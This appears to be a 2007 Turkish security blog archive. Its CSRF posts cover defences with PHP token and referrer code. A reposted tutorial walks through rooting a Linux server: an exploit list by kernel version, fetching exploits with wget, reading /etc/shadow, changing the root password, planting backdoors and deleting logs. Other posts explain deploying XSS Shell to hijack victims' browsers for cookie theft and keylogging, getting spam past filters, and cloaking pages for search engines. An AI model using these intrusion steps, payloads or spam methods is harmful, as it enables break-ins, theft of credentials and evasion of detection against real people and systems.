CSRF Saldırıları ve Korunma (Bölüm 2) @ 01-12-2007 23:42
Korunma Yöntemleri
3- Token (Anahtar)
Token kullanılan en yaygın ve en etkili güvenlik önlemidir diyebiliriz..
Token (anahtar) sisteminin çalışma mantığına göre yönetici giriş formunda o anki oturuma göre bir anahtar oluşturulur ve veritabanına kaydedilir giriş yapıldıktan sonra giriş yapan kişinin anahtarı, veritabanındakiyle karşılaştırılır eğer karşılaştırma uygunsa kullanıcı giriş formunu kullanarak giriş yapmış demektir ve giriş izni verilir eğer uygun değilse oturum iptal edilir.
Tabi token tam bir güvenlik sağlamaz çünkü önemli bir etkisi yoktur fakat her bir anahtarın geçerli olduğu süre aralığı iyi belirlenirse token saldırgan için önemli bir engel oluşturacaktır.
Token ile ilgili örnek kodları aşağıdadır...
<?php
session_start();
$token = md5(uniqid(rand(),TRUE));
$_SESSION['token'] = $token;
$_SESSION['token_time'] = time();
?>
<form action="purchase.php" method="POST">
<input type="hidden" name="token" value="<?php echo $token; ?>" />
<p>
Item:
<select name="item">
<option name="fieldlevel">fieldlevel</option>
<option name="upperdeck">upperdeck</option>
</select><br/>
Number:<input type="text" name="number" /><br/>
<input type="submit" value="Purchase" />
</p>
</form>
Token herhangi bir oturum degiskeni gibi yaratilmali
<?php
if (!isset($_SESSION['token']))
{
$_SESSION['token'] = md5(uniqid(rand(), TRUE));
}
?>
Token'ı basit bir koşul ifadesi ile kontrol edin:
<?php
if ($_POST['token'] == $_SESSION['token'])
{
/* Valid Token */
}
?>
Token'ın geçerliliğini belirli bir zaman periyoduna kısıtlamak, örneğin dört dakika, güvenliği artıracaktır:
<?php
$token_age = time() - $_SESSION['token_time'];
if ($token_age <= 240)
{
/* Less than four minutes has passed. */
}
?>
-----------------------------------------------------------------
4- Server Destekli Korunma
Bahsettiğimiz korunma yöntemlerini ve ileride bahsedeceğimiz bazı ufak tefek korunma yöntemlerini .htaccess dosyası ile serverdan yönetebilirsiniz.
Aşağıda örnek kod yer almaktadır..
RewriteEngine On
Options +FollowSymLinks
AddType application/x-httpd-php .php .xkill
# gelen istege gore engelleme
RewriteCond %{REQUEST_METHOD} ^(HEAD|TRACE|DELETE|TRACK) [NC]
RewriteRule ^(.*)$ deny.xkill [NC]
# referrer kontrolu
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourwebsite\.com/ [NC]
RewriteRule .*\.(php|asp|jsp)$ deny.xkill [NC]
# remote file inclusion ataklarini onlemek icin dosya isimlerini # kisitlama
RewriteCond %{QUERY_STRING} ^(.*)('|<|>|/|\.a|\.c|\.t|\.d|\.p|\.i|\.e|\.j)(.*) [NC]
RewriteRule ^(.*)$ deny.xkill [NC]
--------------------------------------------------------------------
Bu kodlar sizin hayal gücünüze göre daha da genişletilebilir.
5- CAPTCHA
Captcha basitçe, istek yapan kullanıcının ufak bir resim içinde verilecek güvenlik kodunu yazarak doğrulama yapmasıdır.
isteğin içinde bu kod yer alamayacağından saldırgan eli boş dönmüş oalcaktır. Tabi burada kullanılacak güvenlik kodunun nasıl bir kripto sistemiyle belirleneceği, tekrar edip etmeyeceği önemli ayrıntılar.
Referanslar :
http://devlog.info/2007/09/02/cross-sit ... ries-csrf/http://www.0x000000.com/http://www.olympos.org/belgeler/cross-s ... 93445.htmlCSRF Saldırıları ve Korunma (Bölüm 1) @ 01-12-2007 23:16
Csrf (Cross-Site Request Forgeries) saldırıları xss saldırılarının zıt yönlüsü gibi çalışır.
Örneğin bir siteye yetkili bir kullanıcı iziniyle girebildiğinizi düşünelim, bu siteye bağlı aktif bir oturumunuz (session) olması gerekiyor. Aynı anda saldırganın sitesinde veya saldırganın kod yerleştirmiş olduğu herhangi bir sitede (forum vs.) dolaştığınızda saldırgan yetkili olduğunuz sitede gerçekleştirmeniz için size bir request gönderebilir bu sayede yetkili olduğunuz siteye sizin bilgisayarınızdan bir request (istek) gitmiş olacaktır.
Daha açıklayıcı olmak gerekirse bir sitedeki 1 numaralı yazıyı
www.xxx.com/del.php?id=1 linkinden silebildiğinizi düşünün.. Sizin bilgisayarınızdan giden istek bu yazının silinmesine yeterli olabilir.
Saldırı Yöntemleri
Bilinen en yaygın csrf saldırı yöntemi, saldırgan tarafından yapılan requestin size image taglar yoluyla gelmesidir.
Örneğin bir forumda
<img src="http://xxx.org/script.php" width="1" height="1" />
şeklinde yerleştirildiğini sandığınız bir resime tıkladığınızda bilgisayarınız script.php dosyasına göre bir istek gerçekleştirebilir.
Aynı zamanda bu resimin boyutu 1x1 piksel olarak ayarlandığından sizin bunun bir saldırı olduğunu farketmeniz zor olabilir. Bunun dışında script.php dosyası iframe olarakta yerleştirilebilir her iki yöntemde de kurbanın, bunun bir saldırı olduğunu anlaması güçleşecektir.
Korunma Yöntemleri
1- GET Yerine POST Kullanmak
En sık kullanılan korunma yöntemlerinden biri yetkili olduğunuz sitedeki form tipini değiştirmektir. Eğer formunuz GET isteklerini reddeip sadece POST isteklerini yerine getirirse bu tip ataklara büyük ölçüde önlem almış olursunuz fakat bu tek başına yeterli gelmeyecektir.
Sebebine gelirsek
<form action="http://example.org/admincp/delete_article.php" method="post" id="theform">
<input type="hidden" name="id" value="42" />
</form>
gibi bir kod kullanıldığında gönderilen request post olarak iletilecektir.
2- Referrer Kısıtlama
Bir başka korunma yöntemi gelen isteklerin sadece sitenin domaini üzerinden gelmesini istemektir.
Bunun dezavantajı günümüzde güvenlik amacıyla bazı kullanıcıların referrer engelleyen tarayıcı eklentileri kullanması veya bazı proxy sitelerinin bu referrerları engellemesi ya da değiştirmesi.
Bu yöntem kullanılırsa sitenin belli bir kullanıcı kitlesininde siteye girişi yasaklanmış olacaktır.
Yine de bu güvenlik önlemini düşünenler için örnek bir kod aşağıda veriliyor.
/**
* Check the users referrer on POST requests to make sure
* they come from the correct domain.
*
* @param array $whitelist An array of domains that should be
* allowed regardless of the current domain.
*
* @return boolean True if the referer is allowed, false otherwise.
*/
function check_post_referrer($whitelist = array()) {
// Only POST requests should be checked
if (strtoupper($_SERVER['REQUEST_METHOD']) != 'POST') {
return true;
}
$whitelist = (array)$whitelist;
#------------------------------
# Get the referrer host
#------------------------------
$ref_parts = @parse_url($_SERVER['HTTP_REFERER']);
$ref_host = false;
if ($ref_parts AND isset($ref_parts['host']) AND $ref_parts['host']) {
$ref_host = $ref_parts['host'];
}
// No referrer, default to true
if (!$ref_host) {
return true;
}
#------------------------------
# Get the current host and add
# it to the whitelist
#------------------------------
$host = false;
if ($_SERVER['HTTP_HOST']) {
$host = $_SERVER['HTTP_HOST'];
} else if ($_ENV['HTTP_HOST']) {
$host = $_ENV['HTTP_HOST'];
} else if ($_SERVER['SERVER_NAME']) {
$host = $_SERVER['SERVER_NAME'];
} else if ($_ENV['SERVER_NAME']) {
$host = $_ENV['SERVER_NAME'];
}
if ($host) {
array_unshift($whitelist, $host);
}
// If for some reason there are no allowed hosts,
// default to true
if (!$whitelist) {
return true;
}
#------------------------------
# Check the referrer against
# allowed domains
#------------------------------
$valid = false;
foreach ($whitelist as $check_host) {
$check_host = trim($check_host);
// Check with a space on each side to easily
// anchor it without using regex
if (stripos(" $ref_host ", " $check_host ") !== false) {
$valid = true;
break;
}
}
return $valid;
}
--------------------------------------------------------------------
Örnek kullanım aşağıdaki gibidir.
<?php
if (!check_post_referrer()) {
die('Invalid referrer');
}
// Process form
// ...
?>
--------------------------------------------------------------------
Bütün bu önlemlere rağmen saldırının spoof referrerdan gelebilme ihtimali göz ardı edilmemelidir.
Wireless Keyboard Sniffing @ 01-12-2007 21:50
Dreamlab ve remote-exploitin ortak çalışması olan yeni saldırı tekniği geçenlerde duyuruldu.. Aslında 27mhz gibi düşük frekanslardaki bir wireless bağlantısının sniff edileceği zaten teorik olarak hemen hemen herkesin bildiği bir şey.. Ama birinin pratikte bunu göstermesi güzel olmuş..
Dreamlabın bu konuda gösterdiği hassasiyet nedeniyle saldırı ayrıntılarına fazla değinilmemiş..
Saldırıyla ilgili makaleyi okurken benim en çok dikkatimi çeken gelen tuş darbelerinin hiç bir kripto sisteminden geçmemesiydi. Her tuş darbesi için sadece 256 kombinasyonluk ufak bir koruma vardı ki bunu da özellikleri ortalama olan bir bilgisayarla rahatça yapabilirsiniz..
Biz yırtınarak wep, wpa gibi uyduruk kripto sistemleriyle wireless teknolojisinin gelişemeyeceğini söylerken dünya devi firmaların buna bile gerek görmemeleri komik..
Bunun dışında bu klavyeleri kullanan firmaların başında Microsoft ve Logitech gibi sektör devlerinin gelmeside düşündürücü..
Nasıl olsa bizden başka satan yok diyerek kullanıcı güvenliğini bu kadar arka planda bırakmak büyük şirketlerin hiç değişmeyen hali..
Sadece bir haber olduğu için fazla uzatmıycam sadece önemli bir haber olduğu için paylaşmak istedim..
Konuyla ilgili bir video..
http://www.remote-exploit.org/max/automated.htmlKonuyla ilgili dreamlab'ın makalesi..
http://www.dreamlab.net/download/articl ... rities.pdfLocal Rooting @ 05-10-2007 09:59
Uzun süredir yoğunluktan dolayı döküman ekleyemem dolayısıyla site sahipsiz görünmesin diye daha önce bir yerden bulduğum bir dökümanı siteye ekleyeceğim..
Döküman local sistemleri rootlama yöntemlerini çok sade bir dilde anlatıyor..
Daha önce bu tip rooting taktiklerine değindik fakat genellikle konuyu önceden bildiğinizi düşünerek özet olarak geçtik veya saldırının tek bir bölümünü inceledik bunu yapmamın sebebide sitenin teknoloji güvenliği konusunda geliştirilebilir dökümanları içermesini istememdi..
Lafı uzatmadan dökümana geçelim.. Bu arada dökümanı yazan canberx'e de ayrıca teşekkürler..
Konu: Linux Yerel Sistemi Rootlama
Yazar: canberX a.k.a nem0 <tbc.nem0[at]gmail[dot]com>
Tarih: 15/04/2007 – 01:06
Kategori: Hacking - Linux
içindekiler:
0x01 - Giriş
0x02 - Sistem Bilgilerini Toplama
0x03 - Dağıtıma Göre Exploit Bulmak ve Kullanmak
0x04 - Kernel Sürümüne Göre Lokal Exploit Bulmak ve Kullanmak
0x05 - Daemonlara Göre Exploit Bulmak ve Kullanmak
0x06 - Sistemden Dz Bırakmadan Çıkmak
0x07 - Sonuç 0x01 - Giriş:
Merhaba arkadaşlar. Bu yazımda sizlere lokalde erişebildiğimiz bir sistemi nasıl rootlarız,nasıl
dağıtabiliriz kısaca değineceğim ve canlı bir örnek ile pekiştireceğim.Başlamadan önce sizlerde bulunması
gereken bazı önemli exploitleri,programların bir listesini vereceğim (Dökümanın en sonunda indirme linklerini
bulabilirsiniz.).
Lokal bir sistemi rootlamakla ilgili bir tuttorial hazırladım evet ama peki lokal sisteme nasıl gireceğim
diye biraz çelişkiniz varsa,bu dökümanı hiç okumayın ve hemen gidin bir sisteme nasıl sızılır biraz olsun
araştırın ;)
Lokalde yüksek kullanıcı yetkisi(bkz: root,super user) için gerekli lokal exploitlerin bir listesi,bu tür bir
listeye heryerde rastlayabilirsiniz.
2.4.17 -> newlocal, kmod, uselib24
2.4.18-19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21-22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5-8 -> krad, krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13-16 -> raptor, raptor2, h0llyshit, prctl
Kendi bilgisayarınızdan back-connect olabilmek için veya bir bindshell'e bağlanabilmek için NetCat'i
öneriyorum...(not: PuTTy'de elinizde bulunsun...) Ayrıca sistemi kırdıktan yani rootladıktan sonra çeşitli
rootkitlere,bindshell exploitlere,log temizleyecilere ve isteğinize göre spam mail sender veya mass deface exploitlere de ihtiyaç duyabilirsiniz.Bazı önemli exploitler,scriptler: w4ck1ng bindshell Exploit, Log Cleaner,
Mass Script…
0x02 - Sistem Bilgilerini Toplama:
Evet bilindiği üzere sistemimiz bir linux sistem.Bir Linux sistemde ilk önce sistem üzerinde nMap veya
herhangi bir ağ tarama programıyla bir tarama yapalım ve çıkan sonuçları sistemin IP'siyle birlikte not alalım
bir kenarda kalsın çünkü ilerleyen zamanlarda bunlar bize yardımcı olacak.Daha sonra kernel versiyonunu
öğreniriz.
Çünkü önce kernel hacklenmeye çalışılır,eğer kernel hacklenemezse bu sefer sistem üzerindeki kurulu
daemonların açıkları denenir.Her neyse konumuza dönelim.Şimdi sistemin kernel versiyonunu öğrenelim.cat
/proc/version,cat /etc/issue veya uname -r gibi bir komutla kernel versiyonunu alabiliriz(uname komutunda -a
parametresi ile detaylı bilgiye ulaşabilirsiniz.). cat etc/issue;cat/version
Welcome to SuSE Linux 9.3 (x86-64) - Kernel \r (\l).
Linux version 2.6.16.20-060620b (root@buildd-amd64) (gcc version 3.3.5 (Debian 1:3.3.5-13)) #1 SMP Tue Jun 20 14:53:44 CEST 2006
Evet komutun çıktısı karşımıza geldi ve bakıyoruz sistemin kernel versiyonu 2.6.16.20-060620b ve
dağıtım olarak SuSE 9.3 kullanıyor.Kernel 2006 yılında derlenmiş.Şimdi 2 seçeneğim var.Ya kernel versiyonuna
göre lokal exploit arayacağım,ya da dağıtım sürümüne göre(biliyorsunuz ki çoğu linux dağıtımında bazı açıklar
olabiliyor.).
0x03 - Dağıtıma Göre Exploit Kullanma:
Dlk önce dağıtıma göre bir açık aramayı tercih ediyorum ben.Herhangi bir 0day veya Advisory sitesine
gidip dağıtım adını ve versiyonunu yazarak aratıyorum(ben burda milw0rm'ü tercih ettim.).Evet bir exploit
buldum.Exploitimin adı bu:
SuSE Linux 9.{1,2,3}/10.0, Desktop 1.0, UnitedLinux 1.0
Bu exploit SuSE 9.3 ve 10.0 sistemlerde root seviyesinde bir kullanıcı yaratıyor.Exploitimi .sh formatında
kaydedicem(.sh bin/bash programlamanın dosya uzantısıdır.).Daha sonra uzaktaki bir adrese attım
exploitimi.Şimdi sisteme çekmem lazım.Bunun için wget komutunu kullanabilirim(ayrıca lynx,get,fetch,curl gibi
komutlarda var.).
wget
http://xxxxxxxx.xxx/xxxxxx/suse9-3.txt --21:53:34--
http://xxxxxxxx.xxx/xxxxxx/suse9-3.txt => `suse9-3.txt'
Resolving
http://xxxxxxxx.xxx... 208.53.xxx.xx
Connecting to
http://xxxxxxxx.xxx|208.53.xxx.xx|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13,253 (13K) [text/plain]
100%[====================================>] 13,253 --.--K/s
21:53:40 (105.71 KB/s) - `suse9-3.txt' saved [13253/13253]
Evet exploitim geldi.Onu mv komutuyla .sh formatına çevireceğim.Bunun için mv suse9-3.txt suse9-3.sh
komutunu uyguluyorum.Ardından dosyaya chmod 4777 suse9-3.sh komutuyla çalıştırma ve yazılabilme yetkisi
veriyorum.Son olarakta ./suse9-3.sh komutuyla çalıştırıyorum.
Eğer sistem patchsiz ise root yetkisine sahip kullanıcımıza oluşacaktır.
/bin/su file is not setuid root :(
/usr/bin/chfn file is not setuid root :(
Evet hata verdi anlaşılıyor ki sistem pacthlenmiş.Şimdi o zaman 2.elternatife geçeceğim.Yani Kernel
versiyonuna göre bir açık bulup sistemi o şekilde kıracağım. 0x04 - Kernel Sürümüne Göre Lokal Exploit Kullanma:
Hatırlıyorsanız kernel versiyonu 2.6.16-20-060620b idi.Bunun için lokal kernel exploit listeme bakıcam
ve uygun exploiti seçeceğim.raptor, raptor2, h0llyshit, prctl isimli exploitler bu versiyona uygunmuş.Dlk önce
h00lyshit'i deneyeceğim.Yine wget komutuyla exploitimi çektim.h00lyshit'in usage kısmına bakarsanız
görürsünüz zaten kullanımı şu şekildir.
./h00lyshit file
Yukarıda görüldüğü gibi file isimli dosya 100 MB'tan büyük olmalıdır.O zaman cd /tmp komutuyla tmp
dizinine geçicem,neden tmp dizini diye sorarsanız,tmp dizini yazılabilir bir dizindir.100 MB'dan büyük bir dosya
oluşturmak için dd komutunu count ile birlikte kullanıyoruz.
dd if=/dev/zero of=canberX.dat bs=1024k count=130
Yukarıdaki komut ile 1024KB olan bir dosya yarattık ve onu 130 kere count ederek 130 MB'lık bir dosya
elde etmiş olduk.Dsteyenler dosya boyutunu öğrenmek için du -h dosyaAdi komutunu kullanabilirler.Her neyse
exploitimi çalıştırıyorum: chmod 4777 h00lyshit;chmod 4777 canberX.dat
./h00lyshit /tmp/canberX.dat;id
Segmentation Fault
uid=33(www) gid=33(www) groups=8(www)
Evet bakıyoruz Segmentation Fault hatası verdi.Kernele işlemedi exploit.Ama yılmak yok başka bir tane
deniyoruz.Özellikle bu tür bir kernele sahip sistem seçtim ki piyasada 2-3 RFI Bug kullanıp site deface edip
kendini ilah zanneden bazı arkadaşların ısrarla 2.6.* 2006 Updateli kernel kırılmaz diye öne sürdükleri tezlerini
çürütmek için :) Bu sefer prctl isimli exploiti çekiyorum sisteme.Aynı işlemleri bu exploitede uyguluyoruz.
chmod 4777 prctl
./prctl;id
uid=0(root) gid=0(root) groups=8(www),2523(psaserv)
whoami
root Aaa,o da ne,sistem sen root'sun dedi :) Demek oluyor ki pcrtl isimli exploitimiz lokalden sistemi kırmaya
yardımcı oldu.Şimdi bakalım uptime'larına ve sistemde ki kullanıcılara,şifrelere vs...
uptime
6:47pm up 1 day 5:11, 0 users, load average: 0.12, 0.17, 0.18
En son 1 gün önce kullanılmış sistem.Şuan da hiç kullanıcı yokmuş.Burada ki kullanıcıdan kastımız
admin. Hemen /etc/passwd ve /etc/shadow dosyalarında ki root şifrelerine bakıyoruz...
cat /etc/passwd | grep root
root:x:0:0:root:/root:/bin/bash
cat /etc/shadow | grep root
root:$2a$10$hxQEuGI3cVPMH4PJbQ07IOf1eetXDpl37ELK3r7b1U9M8oaQWJNIq:13332:0:10000::::Evet root kullanıcı hesabının bilgilerini görebiliyoruz.Dstersek root kullanıcısına ait şifreyi değiştirebiliriz.
useradd veya adduser komutuyla bir kullanıcı ekleyebilirsiniz sisteme.Ayrıca passwd komutuyla istediğiniz
kullanıcıya ait şifreyi değiştirebilirsiniz.
passwd root
Enter New Password:
Re-Enter New Password:
Password Changed!
Tamamdır yukarıdakine benzer bir adımla root şifresini değiştirdik.Eminim admin sistemine girmeye
çalıştığında bize çok küfür edecek :) Ayrıca sistemde bir arka kapı bırakmayı unutmayın...
0x05 - Daemonlara Göre Exploit Bulmak ve Kullanmak:
Evet geldik sistemde ki 3.alternatif aşamalardan birine.Oldu ki ne kerneli kırabildiniz,ne de dağıtıma
göre bir açık bulup sistemi kıramadınız ve öyle ortada kaldınız.O zaman sistemde kurulu olan Daemon
dediğimiz sistemin işleyişinde rol alan programlar için yazılmış açıkları 0day/Advisory sitelerinden bulup
kullanmamız gerekir.
Daemonlara ait exploitlerin en önemli özellikleri remote exploitlerde olabilmeleridir.Peki bu ne demek?
Yani siz bir mysql,proftpd,samba,Apache,PHP gibi debianlarda ki açıklar sayesinde sistem üzerinde uzaktan
hafıza taşması yaratarak kod çalıştırabilirsiniz.Bunun çok büyük avantajı var.Bu nedenle bu tür debianlarda ki
açıklar genelde public edilmez yani priv8 olarak tutulur.Adam istediği gibi kullanır,daha sonra üreticiye bildirir
açık için yama çıkmadan 1 gün önce 0day sitelerine dağıtır.Genelde underground'da işler bu şekilde
işliyor.Malesef ülkemizin müthiş hackerları emanete pek sadık kalmıyorlar yani akılları sıra kendi milletlerine
yararları dokunuyor neyse burası tartışılır...
Ben Apache 1.3.33/1.3.34 sürümü için çok güzel bir lokal exploit buldum.Debian tabanlı sistemlerde
root olmaya sağlıyor.Bunun açıklamasını yapmayacağım biraz fazla uzadı konu.Zaten eminim exploit kullanma
konusunda bir fikriniz var artık.Zaten eğer bir fikriniz yoksa ya gidin okuyun öğrenin bu dökümanı öyle uygulayın ya da kendinizi camdan aşağı atın :)
0x06 - Sistemden Dz Bırakmadan Çıkmak:
Evet geldik son aşamaya.Artık o gözümüzde büyüttüğümüz root yetkisi bizim gibi değersiz bir adamın
elinde harap oluyor.Belki birilerinin çok değer verdiği web serverları,kişisel bilgisayarlar veya web siteleri tek
bir komutumuza bakıyor(rm -rf / sakın evde denemeyin :P).Ee yaptıkta ne oldu.Tamam yüksek yetki
kazanabildik.
Ama unutmayın çıkarken mutlaka sistemde bir iz bırakmış olabilirsiniz.Bunun için mümkün olduğunuca
aynı dizinlerde çalışın,sisteme bağlanırken bir proxy kullanın ve işiniz bittikten sonra kullandığınız materyalleri
silin.Bunun için log temizleyen scriptler var.Bunların mantığı basittir.
rm -rf /var/logs
Yukarıdaki gibi basit komutlarla belirlenmiş olan log dizinlerindeki dosyaları siler.En son olarakta /tmp
dizini gibi geçici dosyaların olduğu dizini silebilirsiniz.Log temizleyen bir scriptti dökümanın sonundaki
download adreslerinde bulabilirsiniz.Ayrıca logları temizlemeden önce sistemde bir arka kapı bırakırsanız ilerisi
için iyi olur.Zaten root şifresini değiştirmiştik ama her türlü şey için bir sahte kullanıcı veya hortlayacak bir
remote shell bırakmak bizim için iyi olur.Bunun için bir rootkit veya bindshell exploitini kullanabilirsiniz... 0x07 - Sonuç:
Sonuç olarak bu döküman ile bir şekilde erişim sağladığımız bir sistemde lokal sıradan bir kullanıcı iken
nasıl en yüksek yetkiye sahip bir kullanıcı olduk onu gördük.Elimden geldiğince elimdeki sisteme ait açıkları
kullanarak demonstrate(Türkçe karşılığı biraz anlamsız o yüzden bu terimi kullandım) etmeye çalıştım.
Umarım mantık ve yürütülecek yol anlaşılmıştır.Unutmamak gerekirki kırılamayacak bir sistem yoktur(bu
laf son zamanlarda bileninde bilmeyeninde diline sakız oldu ama kapanışı bununla yapalım bu seferlik :) ).
Dyi Hackingler...
Teşekkürler:
Dökümanı hazırlarken bir takım isteklerimi yerine getiren,bana bulmakta zorluk çektiğim scriptleri bulan ve
dökümanı test eden arkadaşım e8,benimle tüm bilgisini paylaşan m0liver,yanlışlıkla kalbini kırdığım
h4ckinger ve şuan adı aklıma gelmeyen tüm arkadaşlarıma teşekkürlerimi sunarım…
Referanslar:
PsyCash - Bir Hackin Anatomisi
Ebixad - System Rooting
Download Linkleri:
NetCat for WINNT -
http://vulnwatch.org/netcat/nc111nt.zip nMap for WINNT -
http://download.insecure.org/nmap/dist/ ... -win32.zip w4ck1ng Bind Shell Exploit -
http://www.w4ck1ng.com/board/showthread ... l-832.html Mass Script -
http://upload2.net/page/download/cHq6Zx ... s.rar.html Log Cleaner -
http://upload2.net/page/download/TaS07H ... x.rar.html Lokal Exploitler -
http://m0liverlab.by.ru/exploitz/rootexploits.rar Xss Shell @ 21-07-2007 09:20
Xss Shell Ferruh Mavituna'nın bri projesi, genel anlamıyla xss ataklarını daha kolay kontrol etme ve tek seferde birden fazla kurbana birden fazla komut vermenize yarıyor.
Scriptin bize sağladığı yararlardan bazıları ddos, cookie alma, keylogger ve her türlü js komutlarını işletebilmek...
Kullanışlı ve xss saldırılarına yeni bir boyut kazandıran bu sistem Ferruh beyin çabalarıyla hızla gelişeceğe benziyor.
Bu yazıda kurulumundan kullanımına ve sık karşılaşılan sorunlara değineceğiz.
İlk olarak kuruluma bakalım..
öncelikle
http://www.portcullis-security.com/ adresinden xss shelli indiriyoruz.
Yeni versiyonlar Xss Tunneling yazılımıyla beraber geliyor bu yazılıma daha sonra değineceğiz şimdilik ihtiyacımız olan xss shell.
Dosyaları Asp hostumuza atıyoruz.
Kendi bilgisayarınıza iis kurarak scripti kendi bilgisayarınız yardımıyla çalıştırabilirsiniz bu konuyla ilgili bir videoyuda
http://ferruh.mavituna.com/makale/xss-s ... all-video/adresinden izleyebilirsiniz.
Dosyaları attıktan sonra dikkat etmek gereken konulardan biri db dosyamıza yani shell.mdb dosyasına yazma izni olup olmadığı bu dosyanın yazma izni yoksa script çalışmayacaktır.
Daha sonra admin klasörünün içindeki db.asp dosyasını açarak "w00t" olan şifre kısmını istediğiniz bir şifre olarak değiştirmek.
Yine db.asp dosyasının içindeki db yolunu gösteren
C:\XSS Shell\XSSShell-060\db\shell.mdb
satırınıda kendi hostunuzdakine göre ayarlamalısınız.
Son olarak xssshell.asp dosyasını açarak
http://www.xssshelltest.com:60000/yazan kısıma kendi scriptimizin adresini veriyoruz.
Böylece kurulumu tamamlamış olduk şimdi tek yapmamız gereken kurbanımızı bu linke yönlendirmek.
Bunu yapabilmek için herhangi bir sayfadan
http://www.example.com/q="><script src="http://[site]/xssshell.asp"></script>
linkini verirseniz kurban sizin istediğiniz adrese yönlenecektir.
Yukarıdaki kod genellikle forum, portal gibi scriptlerde engellendiği için exploit sitelerinde istediğiniz scriptin xss açığını aratarak bu açık yardımıyla kurbanınızı kendi xssshell.asp sayfanıza yönlendirmeniz daha kolay olacaktır.
Bunun dışında
<script src="http://[site]/xssshell.asp"></script>
kodunu kendi hazırladığınız herhangi bir sayfanın bir yerine koyduğunuz takdirde bu sayfayı açan herkes direkt olarak sizin emriniz altına girecektir.
Kurban sizin hazırladığınız sayfada kaldığı sürece
http://[site]/admin
adresinden kurbanı kontrol edebilirsiniz.
Şu an için bilinen buglar
Keyloggerın internet explorer üzerinde çalışmaması ve scriptin Konqueror tarayıcısında işe yaramaması.
Kurulum ya da kullanımda oluşan hataları buradan bana ya da
www.ferruh.mavituna.com adresinden Ferruh beye ulaştırabilirsiniz.
Spam ve İpuçları @ 17-07-2007 16:14
Şahsen spama karşı olmamakla birlikte aşağıdaki vereceğim bilgilerle spam yapanlar domain adresleri spam listelerine alındığı takdirde arama motorlarında alt sıralara düşecektir. Olayın hukuki boyutunu karıştırmıyorum bile :)
Göndereceğiniz maillerin hızlı ve güvenli olarak ulaşması için kendi bilgisayarınızdan spam yapmayı anlatacağım.
Eğer bağlantınız yetersizse ya da uğraşmak istemiyorsanız ve bir host üzerinden spam yapmak istiyorsanız server kurulumunu geçerek sadece gerekli testleri yapmalı ve server üzerinden kullanabileceğiniz uygun yazılımı bulmalısınız.
Tabi serverınız üzerinden mail gönderirken hosting firmanızın size verdiği yetkileride öğrenmek gerekir. Örneğin bazı firmaların günlük mail atma limiti ya da bir seferde belli sayıda mail atma gibi limitleri vardır.
Şimdi kendi bilgisayarımızdan mail atma işlemi için smtp server kurulumuna geçelim.
Basitçe bir smtp server kurmak için mdaemon yazılımını indirerek kurmanız yeterli olacaktır.
mdaemon yazılımını
http://www.altn.com/Products/MessagingS ... s/MDaemon/ adresinden çekebilirsiniz.
Eğer yazılım kullanmadan kurulumu yapmak isterseniz
Başlat>Ayarlar>Denetim Masası>Program ekle kaldır
sekmelerini takip ederek
Windows Bileşenleri ekle/kaldır bölümünden
Internet Information Servicesin içindeki SMTP server sekmesini seçerek kurulumu yapabilirsiniz.
Elle kurulum yaparsanız giriş ayarlarını kendi bilgisayarınıza ya da belli bir kullanıcı adı şifre ile yaptırmanızda yarar var aksi takdirde spammerların hedefi olabilirsiniz.
Kurulum bittikten sonra önemli ayrıntılardan biri de mail atacağınız yazılımdır.
Mailleri atmak için fazla kullanılmayan profesyonel bir yazılım kullanmanız maillerinizin inboxa düşmesinde etkili olacaktır.
Benim tavsiyem paralı yazılımlardan bir tane almanız ya da en azından bunların demolarından birini kullanmanız olacak.
Bu işlemleri bitirdikten sonra artık spam yapmaya başlayabiliriz şimdi maillerimizin inboxa düşmesi için gerekli tüyoları sıralayalım.
İlk olarak spam yapacağınız serverın spam listelerinde olup olmadığını kontrol edin bunu yapmak için
http://www.dnsstuff.com/tools/ip4r.ch?ip=xx.xx.xxx.xxx adresini kullanabilirsiniz. (x karakterleri yerine spam yapacağınız serverın ip adresini yazmanız gerekiyor)
Eğer bütün listelerden not listed yazısını gördüyseniz sorun yok demektir.
Ayrıca maillerin inboxa düşmesini etkileyen en önemli etkenlerden biri ip adresinizin bir domainle ilişkilenmiş olmasıdır.
Bunu yapmak için sabit ip adresiniz varsa bir domain alarak kendi bilgisayarınıza yönlendirebilirsiniz, sabit ip adresiniz yoksa no-ip.com gibi sabit ip hizmeti veren sitelerden ip adresinize bağlı bir sabit subdomain alarak yönlendirmeyi bu adreslere yapabilirsiniz.
Ip adresinizin bir domainle ilişkili olup olmadığını
http://www.dnsstuff.com/tools/ptr.ch?ip=xx.xx.xxx.xxx adresinden kontrol edebilirsiniz.
Bunları yapmak maillerinizin yahoo ve bir çok mail hizmeti veren sunucuda inboxa düşmesini sağlayacaktır.
Şimdi bu maillerimizin hotmailde de inboxa düşmesini sağlamak için yapmamız gereken iki adım daha var.
ilk olarak spf kaydı yaptırmamız lazım bunun için
http://www.microsoft.com/mscorp/safety/ ... id/wizard/ adresini kullanabilirsiniz. Kaydı yaptıktan sonra domaininizin kontrol panelinden spf kaydını ekleyebilirsiniz.
ve son olarak
senderid@microsoft.com 'a domaininizin isminin yazdığı bir mail atmanız yeterli olacak.
Eğer birden fazla domaininiz varsa ve hepsini eklemek istiyorsanız domainleri alt alta yazarak mail atmanız yeterli olacaktır.
Search Engine Optimization (part4)(Dark SEO) @ 04-07-2007 08:06
Doorway Pages : Kullanıcılara görüntülenmeyen sadece arama motorlarının örümceklerini kandırmak için yapılan genellikle kolay indekslenmesi için düz yazı şeklinde hazırlanan sayfalardır.
Bu sayfalarda sahte keywordler ve meta taglar kullanılarak arama motorları kandırılabilir.
Keyword Selection : Keyword seçimleri nette en çok aranan kelime gruplarına göre seçilir internet üzerinde en çok aranan kelimelere
http://www.blackhatseo.com/keywords.shtml adresinden ulaşabilirsiniz.
Cloaker Script : Bu scriptler belirlediğiniz keywordlar doğrultusunda istediğiniz sayıda sahte sayfa oluşturarak arama motorlarından daha fazla kullanıcı çekmenizi sağlar.
